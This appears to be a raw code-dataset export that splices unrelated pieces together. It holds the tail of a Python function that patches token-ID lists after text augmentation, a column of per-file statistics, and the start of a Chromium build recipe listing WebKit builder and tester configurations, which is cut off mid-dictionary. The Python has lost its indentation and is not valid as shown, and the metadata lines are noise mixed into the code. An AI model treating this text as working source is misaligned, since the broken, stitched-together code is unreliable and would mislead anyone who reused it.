tokenized_augmented_text = tokenized_augmented_text[:index] + [519, 70] + tokenized_augmented_text[index + 1:]
if tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and tokenizer.decode(tokenized_text[:2]) == tokenizer.decode(6353):
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_text[:2] + tokenized_augmented_text[index + 1:]
if tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and tokenized_augmented_text[-1] == 20543:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
if tokenized_augmented_text.count(40670) > tokenized_text.count(40670) and tokenized_augmented_text[-1] == 40670:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
if tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and tokenized_augmented_text[-1] == 4210:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
if tokenized_text.count(107) > tokenized_augmented_text.count(107) and tokenized_augmented_text[-1] == 156:
tokenized_augmented_text = tokenized_augmented_text + [107]
if tokenized_text.count(113) > tokenized_augmented_text.count(113) and tokenized_augmented_text[-1] == 156:
tokenized_augmented_text = tokenized_augmented_text + [113]
if tokenized_augmented_text[-1] == 156 and tokenized_text[-2] == 156:
tokenized_augmented_text = tokenized_augmented_text + tokenized_text[-1:]
if tokenized_augmented_text.count(48585) > tokenized_text.count(48585) and tokenizer.decode(tokenized_text[:3]) == tokenizer.decode(48585):
index = tokenized_augmented_text.index(48585)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_text[:3] + tokenized_augmented_text[index + 1:]
if tokenized_text.count(13) > tokenized_augmented_text.count(13) and tokenized_text[-3:] == [13, 163, 106]:
tokenized_augmented_text = tokenized_augmented_text[:-2] + [13, 163, 106]
if len(tokenized_augmented_text) > len(tokenized_text):
while tokenized_text.count(34247) > tokenized_augmented_text.count(34247) and 12919 in tokenized_augmented_text:
index = tokenized_augmented_text.index(12919)
tokenized_augmented_text = tokenized_augmented_text[:index] + [34247] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(27032) > tokenized_augmented_text.count(27032) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [27032] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(15474) > tokenized_augmented_text.count(15474) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [15474] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(12045) > tokenized_augmented_text.count(12045) and 6312 in tokenized_augmented_text:
index = tokenized_augmented_text.index(6312)
tokenized_augmented_text = tokenized_augmented_text[:index] + [12045] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(127) > tokenized_augmented_text.count(127) and 157 in tokenized_augmented_text:
index = tokenized_augmented_text.index(157)
tokenized_augmented_text = tokenized_augmented_text[:index] + [127] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(33951) > tokenized_augmented_text.count(33951) and 25529 in tokenized_augmented_text:
index = tokenized_augmented_text.index(25529)
tokenized_augmented_text = tokenized_augmented_text[:index] + [33951] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(25443) > tokenized_augmented_text.count(25443) and 15166 in tokenized_augmented_text:
index = tokenized_augmented_text.index(15166)
tokenized_augmented_text = tokenized_augmented_text[:index] + [25443] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(234) > tokenized_augmented_text.count(234) and 10263 in tokenized_augmented_text:
index = tokenized_augmented_text.index(10263)
tokenized_augmented_text = tokenized_augmented_text[:index] + [234] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(2515) > tokenized_augmented_text.count(2515) and 163 in tokenized_augmented_text:
index = tokenized_augmented_text.index(163)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2515] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(35050) > tokenized_augmented_text.count(35050) and 114 in tokenized_augmented_text:
index = tokenized_augmented_text.index(114)
tokenized_augmented_text = tokenized_augmented_text[:index] + [35050] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(17683) > tokenized_augmented_text.count(17683) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17683] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(49149) > tokenized_augmented_text.count(49149) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [49149] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(35050) > tokenized_augmented_text.count(35050) and 20543 in tokenized_augmented_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [35050] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(118) < tokenized_augmented_text.count(118) and 157 in tokenized_augmented_text and 157 in tokenized_text:
index = tokenized_augmented_text.index(118)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_augmented_text[index + 1:]
while tokenized_text.count(103) > tokenized_augmented_text.count(103) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [103] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(224) > tokenized_augmented_text.count(224) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [224] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(116) > tokenized_augmented_text.count(116) and 161 in tokenized_augmented_text:
index = tokenized_augmented_text.index(161)
tokenized_augmented_text = tokenized_augmented_text[:index] + [116] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(2238) > tokenized_text.count(2238) and 5488 in tokenized_text and 2364 in tokenized_text:
index = tokenized_augmented_text.index(2238)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [5488, 572] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(297) > tokenized_text.count(297) and 1183 in tokenized_text:
index = tokenized_augmented_text.index(297)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_augmented_text[index + 1:]
# while tokenized_augmented_text.count(11934) > tokenized_text.count(11934) and 23129 in tokenized_text and 32775 in tokenized_text:
# index = tokenized_augmented_text.index(11934)
# tokenized_augmented_text = tokenized_augmented_text[:index-2] + [23129, 764] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(3359) > tokenized_text.count(3359) and 11298 in tokenized_text and 889 in tokenized_text:
index = tokenized_augmented_text.index(3359)
tokenized_augmented_text = tokenized_augmented_text[:index] + [11298, 889] + tokenized_augmented_text[index + 3:]
# while tokenized_augmented_text.count(1158) > tokenized_text.count(1158) and 1083 in tokenized_text and 607 in tokenized_text:
# index = tokenized_augmented_text.index(1158)
# tokenized_augmented_text = tokenized_augmented_text[:index-2] + [607, 1083] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(5872) > tokenized_text.count(5872) and 12453 in tokenized_text and 14864 in tokenized_text:
index = tokenized_augmented_text.index(5872)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [14864, 12453] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(6519) > tokenized_text.count(6519) and 12048 in tokenized_text and 896 in tokenized_text:
index = tokenized_augmented_text.index(6519)
tokenized_augmented_text = tokenized_augmented_text[:index-2] + [896, 12048] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(949) > tokenized_text.count(949) and 5664 in tokenized_text and 358 in tokenized_text:
index = tokenized_augmented_text.index(949)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5664, 358] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(520) > tokenized_text.count(520) and 7402 in tokenized_text and 17738 in tokenized_text:
index = tokenized_augmented_text.index(520)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17738, 7402] + tokenized_augmented_text[index + 4:]
while tokenized_augmented_text.count(14014) > tokenized_text.count(14014) and 3776 in tokenized_text and 5558 in tokenized_text:
index = tokenized_augmented_text.index(14014)
tokenized_augmented_text = tokenized_augmented_text[:index] + [3776, 5558] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(667) > tokenized_text.count(667) and 20282 in tokenized_text and 3701 in tokenized_text:
index = tokenized_augmented_text.index(667)
tokenized_augmented_text = tokenized_augmented_text[:index] + [3701, 20282] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(359) > tokenized_text.count(359) and 2171 in tokenized_text and 577 in tokenized_text:
index = tokenized_augmented_text.index(359)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2171, 577] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(255) > tokenized_text.count(255) and 29690 in tokenized_text:
index = tokenized_augmented_text.index(255)
tokenized_augmented_text = tokenized_augmented_text[:index] + [29690] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(488) > tokenized_text.count(488) and 1872 in tokenized_text:
index = tokenized_augmented_text.index(488)
tokenized_augmented_text = tokenized_augmented_text[:index] + [16590, 1872] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(4782) > tokenized_text.count(4782) and 5620 in tokenized_text:
index = tokenized_augmented_text.index(4782)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5620] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(3897) > tokenized_text.count(3897) and 79 in tokenized_text:
index = tokenized_augmented_text.index(3897)
tokenized_augmented_text = tokenized_augmented_text[:index] + [79, 2913, 7791] + tokenized_augmented_text[index + 4:]
while tokenized_augmented_text.count(230) > tokenized_text.count(230) and 42062 in tokenized_text:
index = tokenized_augmented_text.index(230)
if tokenized_augmented_text[index + 1] == 4210:
tokenized_augmented_text = tokenized_augmented_text[:index] + [42062] + tokenized_augmented_text[index + 2:]
else:
break
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 42062 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [42062] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(67) > tokenized_text.count(67) and 1549 in tokenized_text:
index = tokenized_augmented_text.index(67)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [1549] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(28053) > tokenized_text.count(28053) and 247 in tokenized_text:
index = tokenized_augmented_text.index(28053)
tokenized_augmented_text = tokenized_augmented_text[:index] + [247] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(28053) > tokenized_text.count(28053) and 564 in tokenized_text:
index = tokenized_augmented_text.index(28053)
tokenized_augmented_text = tokenized_augmented_text[:index] + [564] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(5525) < tokenized_text.count(5525) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5525] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(164) < tokenized_text.count(164) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [164] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(245) < tokenized_text.count(245) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [245] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(98) > tokenized_text.count(98) and 94 in tokenized_text:
index = tokenized_augmented_text.index(98)
tokenized_augmented_text = tokenized_augmented_text[:index] + [94] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(102) < tokenized_text.count(102) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [102] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(226) < tokenized_augmented_text.count(226) and 5323 in tokenized_augmented_text and 5323 in tokenized_text:
index = tokenized_augmented_text.index(5323)
if tokenized_augmented_text[index - 1] == 226:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + tokenized_augmented_text[index:]
else:
break
while tokenized_text.count(226) < tokenized_augmented_text.count(226) and 2343 in tokenized_augmented_text and 2343 in tokenized_text:
index = tokenized_augmented_text.index(2343)
if tokenized_augmented_text[index + 1] == 226:
tokenized_augmented_text = tokenized_augmented_text[:index + 1] + tokenized_augmented_text[index + 2:]
else:
break
while tokenized_text.count(220) < tokenized_augmented_text.count(220) and 156 in tokenized_augmented_text and 156 in tokenized_text:
index = tokenized_augmented_text.index(156)
if tokenized_augmented_text[index - 1] == 220:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + tokenized_augmented_text[index:]
else:
break
while tokenized_text.count(297) < tokenized_augmented_text.count(297) and 297 in tokenized_augmented_text and 1183 in tokenized_text:
index = tokenized_augmented_text.index(297)
if tokenized_augmented_text[index - 1] == 705:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + [1183] + tokenized_augmented_text[index + 1:]
else:
break
if tokenized_augmented_text[-2:] == [157, 118] and tokenized_text[-1] == 157:
tokenized_augmented_text = tokenized_augmented_text[:-1]
if len(tokenized_augmented_text) > len(tokenized_text) and augmentation_function == "shuffle_within_sentences_high_pmi":
diff = find_difference(tokenized_text, tokenized_augmented_text)
if tokenizer.decode(diff["in second"]) == tokenizer.decode(diff["in first"][::-1]) and len(diff["in second"]) > 0:
index = tokenized_augmented_text.index(diff["in second"][0])
tokenized_augmented_text = tokenized_augmented_text[:index] + diff["in first"][::-1] + tokenized_augmented_text[index + len(diff["in second"]):]
if len(tokenized_text) > len(tokenized_augmented_text):
if tokenizer.decode(tokenized_text[:2]) == tokenizer.decode(6353) and 6353 not in tokenized_augmented_text:
tokenized_augmented_text = tokenized_text[1:2] + tokenized_augmented_text
return tokenized_augmented_text
| 78.630435
| 194
| 0.704313
| 5,294
| 43,404
| 5.459577
| 0.061012
| 0.277514
| 0.468118
| 0.303602
| 0.843511
| 0.811369
| 0.786216
| 0.727122
| 0.650625
| 0.588347
| 0
| 0.075243
| 0.191019
| 43,404
| 551
| 195
| 78.77314
| 0.7479
| 0.039904
| 0
| 0.250493
| 0
| 0.069034
| 0.025693
| 0.008372
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013807
| false
| 0
| 0
| 0
| 0.033531
| 0.001972
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90ce9e48d1fec03d4905de1987439f4dfdaee094
| 22,967
|
py
|
Python
|
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | 1
|
2020-07-23T11:05:06.000Z
|
2020-07-23T11:05:06.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from . import chromium_chromiumos
from . import steps
SPEC = copy.deepcopy(chromium_chromiumos.SPEC)
for b in SPEC['builders'].itervalues():
b['gclient_apply_config'] = ['blink']
SPEC['settings']['build_gs_bucket'] = 'chromium-webkit-archive'
SPEC['settings']['src_side_runtest_py'] = False
SPEC['builders'].update({
'WebKit Win Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder',
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win7': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win10': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win x64 Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
# TODO(phajdan.jr): Shouldn't be needed once we have 64-bit testers.
'blink_tests',
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder_tester',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder',
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win7 (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder (dbg)',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win x64 Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'compile_targets': [
# TODO(phajdan.jr): Shouldn't be needed once we have 64-bit testers.
'blink_tests',
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder_tester',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.6': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.7': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.8': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.9 (retina)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.9': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.10': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.7 (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder (dbg)',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'ninja_confirm_noop'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux Trusty': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux 32': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux ASAN': {
'chromium_config': 'chromium_clang',
'chromium_apply_config': ['asan', 'mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/ASANExpectations',
# ASAN is roughly 8x slower than Release.
'--time-out-ms', '48000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux MSAN': {
'chromium_config': 'chromium_clang',
'gclient_config': 'chromium',
'chromium_apply_config': [
'mb',
'msan',
'msan_full_origin_tracking',
'prebuilt_instrumented_libraries',
],
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/MSANExpectations',
# Because JS code is run on a simulator, the slowdown in JS-heavy
# tests will be much higher than MSan's average of 3x.
'--time-out-ms', '66000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'Android Builder': {
'chromium_config': 'android',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['android', 'blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
'TARGET_PLATFORM': 'android',
},
'android_config': 'main_builder',
'bot_type': 'builder',
'testing': {
'platform': 'linux',
},
},
'WebKit Android (Nexus4)': {
'chromium_config': 'android',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['android', 'blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
'TARGET_PLATFORM': 'android',
},
'bot_type': 'tester',
'parent_buildername': 'Android Builder',
'android_config': 'main_builder',
'root_devices': True,
'tests': [
steps.GTestTest('blink_heap_unittests'),
steps.GTestTest('webkit_unit_tests'),
steps.BlinkTest(),
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'linux',
},
},
'WebKit Win non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_apply_config': ['oilpan'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src\\third_party\\WebKit\\LayoutTests\\OilpanExpectations',
]),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src\\third_party\\WebKit\\LayoutTests\\OilpanExpectations',
]),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
